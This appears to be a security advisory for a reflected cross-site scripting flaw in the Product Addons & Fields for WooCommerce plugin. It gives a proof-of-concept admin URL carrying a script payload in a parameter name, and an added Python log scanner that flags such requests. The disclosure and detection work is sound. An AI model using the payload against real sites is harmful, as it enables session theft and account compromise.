WordPress Plugin Vulnerabilities
Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site Scripting
Description
The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.
Proof of Concept
Ensure WooCommerce is installed. Visit the following path while logged in as an Admin:
/wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&"><script>alert(/XSS/)</script>=1
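The request above carries its markup in a parameter name rather than a value, so log checks that only inspect values miss it. The following added example (not part of the original advisory or the plugin's code) flags requests to the ppom admin page whose decoded parameter names or values contain HTML metacharacters; the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let reflected text break out of an HTML attribute or tag.
HTML_META = re.compile(r"[<>\"']")
# Request target inside a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2023:10:00:00 +0000] "GET /wp-admin/admin.php'
    '?page=ppom&productmeta_id=5&do_meta=edit HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/May/2023:10:00:05 +0000] "GET /wp-admin/admin.php'
    '?page=ppom&productmeta_id=5&do_meta=edit'
    '&%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E=1 HTTP/1.1" 200 5188',
    '203.0.113.9 - - [01/May/2023:10:00:09 +0000] "GET /wp-admin/admin.php'
    '?page=wc-settings&tab=%3Cb%3E HTTP/1.1" 200 900',
]

def suspicious_params(request_target):
    """Return ("name"|"value", parameter name) pairs holding HTML metacharacters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qsl percent-decodes names and values; keep blank values as well.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if ("page", "ppom") not in pairs:
        return []  # only the admin page named in the advisory is in scope
    hits = []
    for name, value in pairs:
        if HTML_META.search(name):
            hits.append(("name", name))
        if HTML_META.search(value):
            hits.append(("value", name))
    return hits

def scan(log_lines):
    """Return (client address, hits) for every log line with a suspicious request."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((line.split()[0], hits))
    return findings

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```
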
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-05-01
Added
2023-05-03
Last Updated
2023-05-04